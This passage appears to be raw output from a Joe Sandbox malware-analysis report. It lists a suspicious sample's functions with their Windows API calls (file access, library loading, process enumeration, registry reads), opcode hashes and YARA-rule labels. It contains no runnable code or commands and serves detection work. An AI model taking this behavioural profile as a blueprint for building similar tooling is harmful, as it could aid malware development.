                                                              • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                              • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                              • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                              • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                              Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0041BDDF
                                                              • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcmpmemset
                                                              • String ID:
                                                              • API String ID: 1065087418-0
                                                              • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                              • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                              • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                              • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                              Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                              • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                              • String ID:
                                                              • API String ID: 1381354015-0
                                                              • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                              • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                              • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                              • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                              Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID:
                                                              • API String ID: 2221118986-0
                                                              • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                              • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                              • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                              • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                              Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: free
                                                              • String ID:
                                                              • API String ID: 1294909896-0
                                                              • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                              • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                              • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                              • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                              Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                              • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$Time$CloseCompareCreateHandlememset
                                                              • String ID:
                                                              • API String ID: 2154303073-0
                                                              • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                              • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                              • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                              • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                              Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 3150196962-0
                                                              • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                              • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                              • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                              • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                              Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$PointerRead
                                                              • String ID:
                                                              • API String ID: 3154509469-0
                                                              • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                              • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                              • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                              • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                              Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$StringWrite_itowmemset
                                                              • String ID:
                                                              • API String ID: 4232544981-0
                                                              • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                              • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                              • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                              • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                              Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                              • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                              • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                              • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                              Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                              • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$FileModuleName
                                                              • String ID:
                                                              • API String ID: 3859505661-0
                                                              • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                              • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                              • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                              • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                              Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                              • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                              • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                              • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                              Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                              • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                              • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                              • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                              Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                              • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                              • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                              • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                              Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                              • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                              • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                              • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                              Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                              • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                              • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                              • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                              Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                              • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                              • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                              • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                              Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                              • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                              • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                              • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                              Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: EnumNamesResource
                                                              • String ID:
                                                              • API String ID: 3334572018-0
                                                              • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                              • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                              • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                              • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                              Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                              • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                              • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                              • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                              Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CloseFind
                                                              • String ID:
                                                              • API String ID: 1863332320-0
                                                              • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                              • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                              • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                              • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                              Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                              • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                              • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                              • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                              Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                              • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                              • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                              • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                              Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                              • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                              • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                              • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                              Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004095FC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 3655998216-0
